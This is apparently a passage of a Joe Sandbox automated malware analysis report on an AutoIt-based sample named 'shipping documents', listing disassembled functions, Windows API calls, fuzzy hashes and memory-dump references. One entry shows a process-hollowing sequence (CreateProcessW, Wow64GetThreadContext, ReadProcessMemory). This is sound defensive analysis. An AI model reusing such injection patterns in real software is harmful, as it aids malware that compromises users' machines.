Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
String ID:
API String ID: 1552873950-0
Opcode ID: 922d4df5b64e1696f8af207ae7c752e1e6b30532c460fe4269bae0bb53f03174
Instruction ID: 1386bac0f266146730e1d2637af74c408cbc55d776c8e6750fd9fc5d09a56c87
Opcode Fuzzy Hash: 922d4df5b64e1696f8af207ae7c752e1e6b30532c460fe4269bae0bb53f03174
Instruction Fuzzy Hash: 0D5150F1904218AFDF649F64CC45ADEBB7AEF48300F04449EF649A7241DB755990CF58

Function 0067493A Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 006749D0
__flush.LIBCMT ref: 006749F0
__write.LIBCMT ref: 00674A23
__flsbuf.LIBCMT ref: 00674A51

Part of subcall function 00678D68: __getptd_noexit.LIBCMT ref: 00678D68

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
Instruction ID: d4e4c453d26a741c65a2d759ba31ba526f3421e58b565e874feeeef3ba6a39a0
Opcode Fuzzy Hash: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
Instruction Fuzzy Hash: 7541C4716406059BDF288EA9C8889AF77ABEF80360B24C16DE95D87784EF70DD418B44

Function 00654DD0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 141COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00654E1A

Strings

AU3!P/n, xrefs: 00654E14
EA06, xrefs: 0068DCF5

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: _memmove
String ID: AU3!P/n$EA06
API String ID: 4104443479-1756779138
Opcode ID: 877893e7148f693c7d0ad54912d3a2746f0980383805e332b402876d004acd58
Instruction ID: bde04d906be7ae9e9de233490f2bf211c76a93492b9466f590d33b6face8a8c9
Opcode Fuzzy Hash: 877893e7148f693c7d0ad54912d3a2746f0980383805e332b402876d004acd58
Instruction Fuzzy Hash: C3416C72A041545BCF115B688C677FE7FA7AB4130AF1840E9EC829B282DD218DCD87A1

Function 006573E5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0068EE62
GetOpenFileNameW.COMDLG32(?), ref: 0068EEAC

Part of subcall function 006548AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,006548A1,?,?,006537C0,?), ref: 006548CE

Part of subcall function 006709D5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 006709F4

Strings

X, xrefs: 0068EE7A

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen_memset
String ID: X
API String ID: 3777226403-3081909835
Opcode ID: 05f2b057d293ec364ee7d7c9883b6b0beef0b84daa93e56a12fecb554abe0808
Instruction ID: 93c86dbdceb68fb9bfbb2be8083fdf7f4e5c4b95e4b44e9dcd688bc8488779ea
Opcode Fuzzy Hash: 05f2b057d293ec364ee7d7c9883b6b0beef0b84daa93e56a12fecb554abe0808
Instruction Fuzzy Hash: 3B21F6309002589BCB51DF94C8057EE7BFE9F49301F00801AE908E7381DBB8598E8BA5

Function 006B901B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 006B9036
__fread_nolock.LIBCMT ref: 006B904B

Strings

EA06, xrefs: 006B907D

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: __fread_nolock_memmove
String ID: EA06
API String ID: 1988441806-3962188686
Opcode ID: 553a7097b83c02264740aab276619f7c96bd908914e6d25f694a2b3faf3ead1b
Instruction ID: 65933f5ecd242a63be70a0e6722a59dd518005d1f369ef8b61c3be7df30f3936
Opcode Fuzzy Hash: 553a7097b83c02264740aab276619f7c96bd908914e6d25f694a2b3faf3ead1b
Instruction Fuzzy Hash: FA01F971804258BFDB28C6A8C856EEE7BF89B11301F00829EF556D2181E5B5A6048B60

Function 006B9B6D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 006B9B82
GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 006B9B99

Strings

aut, xrefs: 006B9B93

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: e79c1fef3028057310f19152a4551ffa2f02c8e6d17ddd426a25fcaf47062766
Instruction ID: 5ad5b393f46bf204d4b437fc2ea404f0f847ed8757499e78275e22e8915257ab
Opcode Fuzzy Hash: e79c1fef3028057310f19152a4551ffa2f02c8e6d17ddd426a25fcaf47062766
Instruction Fuzzy Hash: C9D05E7994130EBBDB109BD4DC0EFAA776CE704700F0042A2BE55911A1DEB456988B91

Function 006CCDF1 Relevance: 4.9, APIs: 3, Instructions: 392COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7540d71cec85f8dd4f6492f16a87e52bb06c3c4666b4cf04c7f4478919c85b0a
Instruction ID: 245523f3fcba95180e502b92461fafe885839720d8f94e81bb887e3b00d330f6
Opcode Fuzzy Hash: 7540d71cec85f8dd4f6492f16a87e52bb06c3c4666b4cf04c7f4478919c85b0a
Instruction Fuzzy Hash: EAF13B706083019FCB54DF28C484A6ABBE6FF88314F14892EF89A9B351D735E945CF96

Function 006543DB Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00654401
Shell_NotifyIconW.SHELL32(00000000,?), ref: 006544A6
Shell_NotifyIconW.SHELL32(00000001,?), ref: 006544C3

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: IconNotifyShell_$_memset
String ID:
API String ID: 1505330794-0
Opcode ID: d6a7a696883ca38b026073d6bc953522221505e857eaa5cde4c2c6535569278d
Instruction ID: 4be4800e8d432063508ee6de5cfb405ba32a39e9ff4617a9441b02c956813b7c
Opcode Fuzzy Hash: d6a7a696883ca38b026073d6bc953522221505e857eaa5cde4c2c6535569278d
Instruction Fuzzy Hash: 303184705057118FD720DF24D8847DBBBF9FB48309F00496EE99A83381DB756988CB96

Function 0067594C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__FF_MSGBANNER.LIBCMT ref: 00675963

Part of subcall function 0067A3AB: __NMSG_WRITE.LIBCMT ref: 0067A3D2
Part of subcall function 0067A3AB: __NMSG_WRITE.LIBCMT ref: 0067A3DC

__NMSG_WRITE.LIBCMT ref: 0067596A

Part of subcall function 0067A408: GetModuleFileNameW.KERNEL32(00000000,007143BA,00000104,?,00000001,00000000), ref: 0067A49A
Part of subcall function 0067A408: ___crtMessageBoxW.LIBCMT ref: 0067A548

Part of subcall function 006732DF: ___crtCorExitProcess.LIBCMT ref: 006732E5
Part of subcall function 006732DF: ExitProcess.KERNEL32 ref: 006732EE

Part of subcall function 00678D68: __getptd_noexit.LIBCMT ref: 00678D68

RtlAllocateHeap.NTDLL(01310000,00000000,00000001,00000000,?,?,?,00671013,?), ref: 0067598F

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
String ID:
API String ID: 1372826849-0
Opcode ID: dbd81505a1b3ae94742cc06c882e5d81b17a6d0d141e19424356c6593066d5e7
Instruction ID: c0b76635a1a68474188324cd13551c062805a3254117f77d8e1736542bc31e49
Opcode Fuzzy Hash: dbd81505a1b3ae94742cc06c882e5d81b17a6d0d141e19424356c6593066d5e7
Instruction Fuzzy Hash: 8D01D231341B55DEE6613B78DC46AAE738B9F41770F10C1AEF60E9B2C1DEB09D418269

Function 006B9B2C Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,006B97D2,?,?,?,?,?,00000004), ref: 006B9B45
SetFileTime.KERNELBASE(00000000,?,00000000,?,?,006B97D2,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 006B9B5B
CloseHandle.KERNEL32(00000000,?,006B97D2,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 006B9B62

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: 0fe9c937d7ba24e25e444c8e6da4b3ab0bcea3c823ed8acadf78e0438fd7702e
Instruction ID: 628093e36946a903a24bac3a47ebd09ee53ec62aad535bcb3cb8265fda50b2de
Opcode Fuzzy Hash: 0fe9c937d7ba24e25e444c8e6da4b3ab0bcea3c823ed8acadf78e0438fd7702e
Instruction Fuzzy Hash: 84E08632581224B7D7211B54EC09FDA7B1AAB05761F114121FB15691E087B126119798

Function 006B8F97 Relevance: 4.5, APIs: 3, Instructions: 22COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 006B8FA5

Part of subcall function 00672F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00679C64), ref: 00672FA9
Part of subcall function 00672F95: GetLastError.KERNEL32(00000000,?,00679C64), ref: 00672FBB

_free.LIBCMT ref: 006B8FB6
_free.LIBCMT ref: 006B8FC8

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 180ac2cc07007adee99720b26c657bf09b4177bae862674a470a9d0e5fc62c6e
Instruction ID: f37150dea037411127d58dc65d52c75b2914a06ff8ef9b4f8ae7ae33a8bb1f16
Opcode Fuzzy Hash: 180ac2cc07007adee99720b26c657bf09b4177bae862674a470a9d0e5fc62c6e
Instruction Fuzzy Hash: ACE012E16097024ECA64A978AD50AE357FF5F48390718081DF44DDB242DE28E891C628

Function 0065AB23 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON

Download Yara Rule

Strings

CALL, xrefs: 0069002B

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID:
String ID: CALL
API String ID: 0-4196123274
Opcode ID: cfcba0734ca6e04d8ba0a0db21fdb20291895cedf2221f41092f12533e6a9ae5
Instruction ID: e07110dfefc41988294a38571d014e02505af07e442635fbdff50f8608bf02bf
Opcode Fuzzy Hash: cfcba0734ca6e04d8ba0a0db21fdb20291895cedf2221f41092f12533e6a9ae5
Instruction Fuzzy Hash: D5224770508241CFDB64DF54C494B6ABBF2BF85301F148A5DE89A8B362D731ED89CB86

Function 0065492E Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 00654992

Part of subcall function 006735AC: __lock.LIBCMT ref: 006735B2
Part of subcall function 006735AC: DecodePointer.KERNEL32(00000001,?,006549A7,006A81BC), ref: 006735BE
Part of subcall function 006735AC: EncodePointer.KERNEL32(?,?,006549A7,006A81BC), ref: 006735C9

Part of subcall function 00654A5B: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00654A73
Part of subcall function 00654A5B: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00654A88

Part of subcall function 00653B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00653B7A
Part of subcall function 00653B4C: IsDebuggerPresent.KERNEL32 ref: 00653B8C
Part of subcall function 00653B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,007162F8,007162E0,?,?), ref: 00653BFD
Part of subcall function 00653B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 00653C81

SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 006549D2

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
String ID:
API String ID: 1438897964-0
Opcode ID: bc7501e175461665c8f5a25d112d71af83f40341357383987904ccc69a700428
Instruction ID: 604418798e3bde0eff82d3c52b157450b8d28e38970e7970556562ff216ec30c
Opcode Fuzzy Hash: bc7501e175461665c8f5a25d112d71af83f40341357383987904ccc69a700428
Instruction Fuzzy Hash: AC118E719043119BC700DF29EC0598AFBF9FB98710F00C51EF845832A1DB749649CBAA

Function 00670FF6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0067594C: __FF_MSGBANNER.LIBCMT ref: 00675963
Part of subcall function 0067594C: __NMSG_WRITE.LIBCMT ref: 0067596A
Part of subcall function 0067594C: RtlAllocateHeap.NTDLL(01310000,00000000,00000001,00000000,?,?,?,00671013,?), ref: 0067598F

std::exception::exception.LIBCMT ref: 0067102C
__CxxThrowException@8.LIBCMT ref: 00671041

Part of subcall function 006787DB: RaiseException.KERNEL32(?,?,?,0070BAF8,00000000,?,?,?,?,00671046,?,0070BAF8,?,00000001), ref: 00678830

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
String ID:
API String ID: 3902256705-0
Opcode ID: 83edafb8f9a2c5e19881e282f93674c5919b9e94a18ee560a3a7d05d1bd14377
Instruction ID: dfe5d5fec9358f857c468fd79f1a5edb3a6b3c86b1b3621bc2080dfc99f6fbe2
Opcode Fuzzy Hash: 83edafb8f9a2c5e19881e282f93674c5919b9e94a18ee560a3a7d05d1bd14377
Instruction Fuzzy Hash: 92F0F93454035DA6CB20AE58DC159DF7BAF9F01350F20805AF90C96281EFF09E9092A4

Function 0067582D Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 0067585C
__lock_file.LIBCMT ref: 0067587D

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: __lock_file_memset
String ID:
API String ID: 26237723-0
Opcode ID: dbe8de72a1888f2fac2663a7b58f30b1bb18cb406e00e8ea7d71972a7a6b129a
Instruction ID: 6a1c0887ae15c9693b14d38ac61ca50db9448680aeaba489cdff5167664e925f
Opcode Fuzzy Hash: dbe8de72a1888f2fac2663a7b58f30b1bb18cb406e00e8ea7d71972a7a6b129a
Instruction Fuzzy Hash: C201D871D00614EBCF51AFA58C054CF7B63AF40360F04C259F81C5B2A1DB718A11DB96

Function 006755D6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00678D68: __getptd_noexit.LIBCMT ref: 00678D68

__lock_file.LIBCMT ref: 0067561B

Part of subcall function 00676E4E: __lock.LIBCMT ref: 00676E71

__fclose_nolock.LIBCMT ref: 00675626

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: 89d9daf45c7e2672f99205a7476c3a07f065601a19d2d4dc02ccf0c78b9651b7
Instruction ID: 155b071050f614995b221f5e9dc7268eac06eb01aeb1a84f1bebbb643329d98a
Opcode Fuzzy Hash: 89d9daf45c7e2672f99205a7476c3a07f065601a19d2d4dc02ccf0c78b9651b7
Instruction Fuzzy Hash: 6FF0F671900A049ED7606B348806B5E76935F40730F54C24DA41EAB1D1CFBC8E018B59

Function 03BA129D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 03BA1A5B
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03BA1AF1
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03BA1B13

Memory Dump Source

Source File: 00000000.00000002.2068540502.0000000003BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03BA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3ba0000_shipping documents.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: 935c44ad8318b3af66d252774f477c9026677184fbf87e93bc0843909b837ee7
Instruction ID: 7cae3a321efc693c9fd1ef261d37c88fb0f4cc0b692e9d6b17289e565edda452
Opcode Fuzzy Hash: 935c44ad8318b3af66d252774f477c9026677184fbf87e93bc0843909b837ee7
Instruction Fuzzy Hash: 0912CE24E18658C6EB24DF64D8507DEB232EF68300F1090E9910DEB7A5E77A4F81CF5A

Function 006900D6 Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 006900E1

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 4e3678beee3c8cb72f32e3d5cb131abcbd3eaf69e20f831a9c33163a6a690815
Instruction ID: 08835de96d9d520eb40dd0c53c8293367574b2884c453077222f853df945e609
Opcode Fuzzy Hash: 4e3678beee3c8cb72f32e3d5cb131abcbd3eaf69e20f831a9c33163a6a690815
Instruction Fuzzy Hash: E7413974508341CFDB24DF54C484B5ABBE2BF45318F19899CE8894B762C732EC89CB56

Function 00654F3D Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00654D13: FreeLibrary.KERNEL32(00000000,?), ref: 00654D4D

Part of subcall function 0067548B: __wfsopen.LIBCMT ref: 00675496

LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,007162F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00654F6F

Part of subcall function 00654CC8: FreeLibrary.KERNEL32(00000000), ref: 00654D02

Part of subcall function 00654DD0: _memmove.LIBCMT ref: 00654E1A

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

